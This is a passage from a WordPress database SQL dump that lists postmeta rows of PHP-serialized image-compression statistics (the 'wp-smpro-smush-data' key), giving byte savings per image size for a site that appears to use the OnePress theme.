:\"size_before\";i:387463;s:10:\"size_after\";i:297425;s:4:\"time\";d:1.160000000000000142108547152020037174224853515625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:24.699999999999999289457264239899814128875732421875;s:5:\"bytes\";i:3887;s:11:\"size_before\";i:15737;s:10:\"size_after\";i:11850;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:23.1099999999999994315658113919198513031005859375;s:5:\"bytes\";i:10699;s:11:\"size_before\";i:46297;s:10:\"size_after\";i:35598;s:4:\"time\";d:0.11000000000000000055511151231257827021181583404541015625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:25.1099999999999994315658113919198513031005859375;s:5:\"bytes\";i:9713;s:11:\"size_before\";i:38678;s:10:\"size_after\";i:28965;s:4:\"time\";d:0.0899999999999999966693309261245303787291049957275390625;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.910000000000000142108547152020037174224853515625;s:5:\"bytes\";i:20442;s:11:\"size_before\";i:97776;s:10:\"size_after\";i:77334;s:4:\"time\";d:0.2399999999999999911182158029987476766109466552734375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:23.969999999999998863131622783839702606201171875;s:5:\"bytes\";i:45297;s:11:\"size_before\";i:188975;s:10:\"size_after\";i:143678;s:4:\"time\";d:0.68000000000000004884981308350688777863979339599609375;}}}'),(4160,2457,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:26.038115340623395610464285709895193576812744140625;s:5:\"bytes\";i:47123;s:11:\"size_before\";i:180977;s:10:\"size_after\";i:133854;s:4:\"time\";d:0.47000000000000008437694987151189707219600677490234375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:21.800000000000000710542735760100185871124267578125;s:5:\"bytes\";i:3014;s:11:\"size_before\";i:13825;s:10:\"size_after\";i:10811;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.940000000000001278976924368180334568023681640625;s:5:\"bytes\";i:5807;s:11:\"size_before\";i:34287;s:10:\"size_after\";i:28480;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:18.42999999999999971578290569595992565155029296875;s:5:\"bytes\";i:3718;s:11:\"size_before\";i:20178;s:10:\"size_after\";i:16460;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.8100000000000004973799150320701301097869873046875;s:5:\"bytes\";i:7052;s:11:\"size_before\";i:51054;s:10:\"size_after\";i:44002;s:4:\"time\";d:0.13000000000000000444089209850062616169452667236328125;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:44.6700000000000017053025658242404460906982421875;s:5:\"bytes\";i:27532;s:11:\"size_before\";i:61633;s:10:\"size_after\";i:34101;s:4:\"time\";d:0.1700000000000000122124532708767219446599483489990234375;}}}'),(4161,2456,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:2.115870129133322397052552332752384245395660400390625;s:5:\"bytes\";i:6713;s:11:\"size_before\";i:317269;s:10:\"size_after\";i:310556;s:4:\"time\";d:0.4699999999999999733546474089962430298328399658203125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.5800000000000000710542735760100185871124267578125;s:5:\"bytes\";i:1390;s:11:\"size_before\";i:18328;s:10:\"size_after\";i:16938;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:2.689999999999999946709294817992486059665679931640625;s:5:\"bytes\";i:1353;s:11:\"size_before\";i:50308;s:10:\"size_after\";i:48955;s:4:\"time\";d:0.0899999999999999966693309261245303787291049957275390625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:32848;s:10:\"size_after\";i:32848;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:91036;s:10:\"size_after\";i:91036;s:4:\"time\";d:0.11000000000000000055511151231257827021181583404541015625;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.180000000000000159872115546022541821002960205078125;s:5:\"bytes\";i:3970;s:11:\"size_before\";i:124749;s:10:\"size_after\";i:120779;s:4:\"time\";d:0.179999999999999993338661852249060757458209991455078125;}}}'),(4162,2455,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:26.5946168095155854871336487121880054473876953125;s:5:\"bytes\";i:89301;s:11:\"size_before\";i:335786;s:10:\"size_after\";i:246485;s:4:\"time\";d:0.5500000000000000444089209850062616169452667236328125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.339999999999999857891452847979962825775146484375;s:5:\"bytes\";i:2051;s:11:\"size_before\";i:15370;s:10:\"size_after\";i:13319;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.28999999999999914734871708787977695465087890625;s:5:\"bytes\";i:5959;s:11:\"size_before\";i:38963;s:10:\"size_after\";i:33004;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.1199999999999992184029906638897955417633056640625;s:5:\"bytes\";i:7240;s:11:\"size_before\";i:47890;s:10:\"size_after\";i:40650;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.4199999999999999289457264239899814128875732421875;s:5:\"bytes\";i:15472;s:11:\"size_before\";i:107265;s:10:\"size_after\";i:91793;s:4:\"time\";d:0.1700000000000000122124532708767219446599483489990234375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:46.38000000000000255795384873636066913604736328125;s:5:\"bytes\";i:58579;s:11:\"size_before\";i:126298;s:10:\"size_after\";i:67719;s:4:\"time\";d:0.2200000000000000011102230246251565404236316680908203125;}}}'),(4163,2454,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:14.7295046625466046208430270780809223651885986328125;s:5:\"bytes\";i:34845;s:11:\"size_before\";i:236566;s:10:\"size_after\";i:201721;s:4:\"time\";d:0.520000000000000017763568394002504646778106689453125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.3699999999999992184029906638897955417633056640625;s:5:\"bytes\";i:2560;s:11:\"size_before\";i:17813;s:10:\"size_after\";i:15253;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.9900000000000002131628207280300557613372802734375;s:5:\"bytes\";i:4810;s:11:\"size_before\";i:48136;s:10:\"size_after\";i:43326;s:4:\"time\";d:0.0899999999999999966693309261245303787291049957275390625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:1.1999999999999999555910790149937383830547332763671875;s:5:\"bytes\";i:240;s:11:\"size_before\";i:20034;s:10:\"size_after\";i:19794;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:60897;s:10:\"size_after\";i:60897;s:4:\"time\";d:0.13000000000000000444089209850062616169452667236328125;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:30.370000000000000994759830064140260219573974609375;s:5:\"bytes\";i:27235;s:11:\"size_before\";i:89686;s:10:\"size_after\";i:62451;s:4:\"time\";d:0.2099999999999999922284388276239042170345783233642578125;}}}'),(4164,2453,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:23.45605633483906871106228209100663661956787109375;s:5:\"bytes\";i:82874;s:11:\"size_before\";i:353316;s:10:\"size_after\";i:270442;s:4:\"time\";d:0.61999999999999999555910790149937383830547332763671875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.7799999999999993605115378159098327159881591796875;s:5:\"bytes\";i:3305;s:11:\"size_before\";i:20949;s:10:\"size_after\";i:17644;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.3499999999999996447286321199499070644378662109375;s:5:\"bytes\";i:7573;s:11:\"size_before\";i:56735;s:10:\"size_after\";i:49162;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.589999999999999857891452847979962825775146484375;s:5:\"bytes\";i:4289;s:11:\"size_before\";i:37010;s:10:\"size_after\";i:32721;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.4199999999999999289457264239899814128875732421875;s:5:\"bytes\";i:11827;s:11:\"size_before\";i:103583;s:10:\"size_after\";i:91756;s:4:\"time\";d:0.179999999999999993338661852249060757458209991455078125;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:41.38000000000000255795384873636066913604736328125;s:5:\"bytes\";i:55880;s:11:\"size_before\";i:135039;s:10:\"size_after\";i:79159;s:4:\"time\";d:0.2600000000000000088817841970012523233890533447265625;}}}'),(4165,2450,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:4.48116325181758146101174133946187794208526611328125;s:5:\"bytes\";i:678;s:11:\"size_before\";i:15130;s:10:\"size_after\";i:14452;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:2:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.95000000000000017763568394002504646778106689453125;s:5:\"bytes\";i:221;s:11:\"size_before\";i:5595;s:10:\"size_after\";i:5374;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.79000000000000003552713678800500929355621337890625;s:5:\"bytes\";i:457;s:11:\"size_before\";i:9535;s:10:\"size_after\";i:9078;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4166,2449,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:4.444867161245323217144687077961862087249755859375;s:5:\"bytes\";i:701;s:11:\"size_before\";i:15771;s:10:\"size_after\";i:15070;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:2:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.38999999999999968025576890795491635799407958984375;s:5:\"bytes\";i:274;s:11:\"size_before\";i:6236;s:10:\"size_after\";i:5962;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.480000000000000426325641456060111522674560546875;s:5:\"bytes\";i:427;s:11:\"size_before\";i:9535;s:10:\"size_after\";i:9108;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4167,2447,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:5.92243289347267687361409116419963538646697998046875;s:5:\"bytes\";i:6041;s:11:\"size_before\";i:102002;s:10:\"size_after\";i:95961;s:4:\"time\";d:0.2800000000000000266453525910037569701671600341796875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:3:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:2.890000000000000124344978758017532527446746826171875;s:5:\"bytes\";i:568;s:11:\"size_before\";i:19666;s:10:\"size_after\";i:19098;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.71999999999999975131004248396493494510650634765625;s:5:\"bytes\";i:2559;s:11:\"size_before\";i:44769;s:10:\"size_after\";i:42210;s:4:\"time\";d:0.11999999999999999555910790149937383830547332763671875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.7599999999999997868371792719699442386627197265625;s:5:\"bytes\";i:2914;s:11:\"size_before\";i:37567;s:10:\"size_after\";i:34653;s:4:\"time\";d:0.1000000000000000055511151231257827021181583404541015625;}}}'),(4168,2446,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:2.8939985887131474129319030907936394214630126953125;s:5:\"bytes\";i:3363;s:11:\"size_before\";i:116206;s:10:\"size_after\";i:112843;s:4:\"time\";d:0.340000000000000024424906541753443889319896697998046875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.71999999999999975131004248396493494510650634765625;s:5:\"bytes\";i:700;s:11:\"size_before\";i:14839;s:10:\"size_after\";i:14139;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:2.4199999999999999289457264239899814128875732421875;s:5:\"bytes\";i:729;s:11:\"size_before\";i:30147;s:10:\"size_after\";i:29418;s:4:\"time\";d:0.1000000000000000055511151231257827021181583404541015625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:1.899999999999999911182158029987476766109466552734375;s:5:\"bytes\";i:425;s:11:\"size_before\";i:22382;s:10:\"size_after\";i:21957;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.089999999999999857891452847979962825775146484375;s:5:\"bytes\";i:1509;s:11:\"size_before\";i:48838;s:10:\"size_after\";i:47329;s:4:\"time\";d:0.13000000000000000444089209850062616169452667236328125;}}}'),(4169,2444,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:18.506574051103942935014856630004942417144775390625;s:5:\"bytes\";i:13428;s:11:\"size_before\";i:72558;s:10:\"size_after\";i:59130;s:4:\"time\";d:0.09999999999999999167332731531132594682276248931884765625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.8499999999999996447286321199499070644378662109375;s:5:\"bytes\";i:275;s:11:\"size_before\";i:2793;s:10:\"size_after\";i:2518;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.480000000000000426325641456060111522674560546875;s:5:\"bytes\";i:570;s:11:\"size_before\";i:4569;s:10:\"size_after\";i:3999;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:19.989999999999998436805981327779591083526611328125;s:5:\"bytes\";i:3288;s:11:\"size_before\";i:16450;s:10:\"size_after\";i:13162;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:22.07000000000000028421709430404007434844970703125;s:5:\"bytes\";i:5592;s:11:\"size_before\";i:25343;s:10:\"size_after\";i:19751;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.3499999999999996447286321199499070644378662109375;s:5:\"bytes\";i:470;s:11:\"size_before\";i:3520;s:10:\"size_after\";i:3050;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.199999999999999289457264239899814128875732421875;s:5:\"bytes\";i:1200;s:11:\"size_before\";i:7895;s:10:\"size_after\";i:6695;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.96000000000000085265128291212022304534912109375;s:5:\"bytes\";i:2033;s:11:\"size_before\";i:11988;s:10:\"size_after\";i:9955;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4170,2443,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:1.2176142085507646317665830792975611984729766845703125;s:5:\"bytes\";i:1862;s:11:\"size_before\";i:152922;s:10:\"size_after\";i:151060;s:4:\"time\";d:0.520000000000000017763568394002504646778106689453125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:17205;s:10:\"size_after\";i:17205;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.04999999999999982236431605997495353221893310546875;s:5:\"bytes\";i:914;s:11:\"size_before\";i:30011;s:10:\"size_after\";i:29097;s:4:\"time\";d:0.0899999999999999966693309261245303787291049957275390625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.160000000000000142108547152020037174224853515625;s:5:\"bytes\";i:948;s:11:\"size_before\";i:30026;s:10:\"size_after\";i:29078;s:4:\"time\";d:0.0899999999999999966693309261245303787291049957275390625;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:75680;s:10:\"size_after\";i:75680;s:4:\"time\";d:0.299999999999999988897769753748434595763683319091796875;}}}'),(4171,2442,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:252129;s:10:\"size_after\";i:252129;s:4:\"time\";d:0.3000000000000000444089209850062616169452667236328125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:24998;s:10:\"size_after\";i:24998;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:50193;s:10:\"size_after\";i:50193;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:49936;s:10:\"size_after\";i:49936;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:127002;s:10:\"size_after\";i:127002;s:4:\"time\";d:0.14000000000000001332267629550187848508358001708984375;}}}'),(4172,2441,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:2.237190598959937215539639510097913444042205810546875;s:5:\"bytes\";i:5085;s:11:\"size_before\";i:227294;s:10:\"size_after\";i:222209;s:4:\"time\";d:0.42000000000000003996802888650563545525074005126953125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.160000000000000142108547152020037174224853515625;s:5:\"bytes\";i:888;s:11:\"size_before\";i:21328;s:10:\"size_after\";i:20440;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.67999999999999971578290569595992565155029296875;s:5:\"bytes\";i:2151;s:11:\"size_before\";i:45955;s:10:\"size_after\";i:43804;s:4:\"time\";d:0.0899999999999999966693309261245303787291049957275390625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.5;s:5:\"bytes\";i:2046;s:11:\"size_before\";i:45447;s:10:\"size_after\";i:43401;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:114564;s:10:\"size_after\";i:114564;s:4:\"time\";d:0.2099999999999999922284388276239042170345783233642578125;}}}'),(4173,2440,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:3.52352395851439847973551877657882869243621826171875;s:5:\"bytes\";i:4865;s:11:\"size_before\";i:138072;s:10:\"size_after\";i:133207;s:4:\"time\";d:0.3000000000000000444089209850062616169452667236328125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:2.569999999999999840127884453977458178997039794921875;s:5:\"bytes\";i:481;s:11:\"size_before\";i:18714;s:10:\"size_after\";i:18233;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:1.8899999999999999023003738329862244427204132080078125;s:5:\"bytes\";i:472;s:11:\"size_before\";i:24974;s:10:\"size_after\";i:24502;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:0.9499999999999999555910790149937383830547332763671875;s:5:\"bytes\";i:239;s:11:\"size_before\";i:25046;s:10:\"size_after\";i:24807;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.29999999999999982236431605997495353221893310546875;s:5:\"bytes\";i:3673;s:11:\"size_before\";i:69338;s:10:\"size_after\";i:65665;s:4:\"time\";d:0.1499999999999999944488848768742172978818416595458984375;}}}'),(4174,2439,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:133601;s:10:\"size_after\";i:133601;s:4:\"time\";d:0.39000000000000001332267629550187848508358001708984375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:15412;s:10:\"size_after\";i:15412;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:25950;s:10:\"size_after\";i:25950;s:4:\"time\";d:0.1000000000000000055511151231257827021181583404541015625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:25989;s:10:\"size_after\";i:25989;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:66250;s:10:\"size_after\";i:66250;s:4:\"time\";d:0.190000000000000002220446049250313080847263336181640625;}}}'),(4175,2438,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:8.985446108415946042669020243920385837554931640625;s:5:\"bytes\";i:9372;s:11:\"size_before\";i:104302;s:10:\"size_after\";i:94930;s:4:\"time\";d:0.320000000000000006661338147750939242541790008544921875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.80999999999999960920149533194489777088165283203125;s:5:\"bytes\";i:709;s:11:\"size_before\";i:10407;s:10:\"size_after\";i:9698;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.589999999999999857891452847979962825775146484375;s:5:\"bytes\";i:1899;s:11:\"size_before\";i:19812;s:10:\"size_after\";i:17913;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.92999999999999971578290569595992565155029296875;s:5:\"bytes\";i:1760;s:11:\"size_before\";i:19714;s:10:\"size_after\";i:17954;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.199999999999999289457264239899814128875732421875;s:5:\"bytes\";i:5004;s:11:\"size_before\";i:54369;s:10:\"size_after\";i:49365;s:4:\"time\";d:0.1600000000000000033306690738754696212708950042724609375;}}}'),(4176,2437,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:17.60539208038193947913896408863365650177001953125;s:5:\"bytes\";i:5642;s:11:\"size_before\";i:32047;s:10:\"size_after\";i:26405;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.71000000000000085265128291212022304534912109375;s:5:\"bytes\";i:373;s:11:\"size_before\";i:2934;s:10:\"size_after\";i:2561;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.6400000000000005684341886080801486968994140625;s:5:\"bytes\";i:713;s:11:\"size_before\";i:4286;s:10:\"size_after\";i:3573;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.21000000000000085265128291212022304534912109375;s:5:\"bytes\";i:579;s:11:\"size_before\";i:4074;s:10:\"size_after\";i:3495;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:18.519999999999999573674358543939888477325439453125;s:5:\"bytes\";i:1527;s:11:\"size_before\";i:8245;s:10:\"size_after\";i:6718;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:19.589999999999999857891452847979962825775146484375;s:5:\"bytes\";i:2450;s:11:\"size_before\";i:12508;s:10:\"size_after\";i:10058;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4177,2436,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:15.7197171587961488370410734205506742000579833984375;s:5:\"bytes\";i:4424;s:11:\"size_before\";i:28143;s:10:\"size_after\";i:23719;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.6300000000000007815970093361102044582366943359375;s:5:\"bytes\";i:481;s:11:\"size_before\";i:3528;s:10:\"size_after\";i:3047;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.660000000000000142108547152020037174224853515625;s:5:\"bytes\";i:766;s:11:\"size_before\";i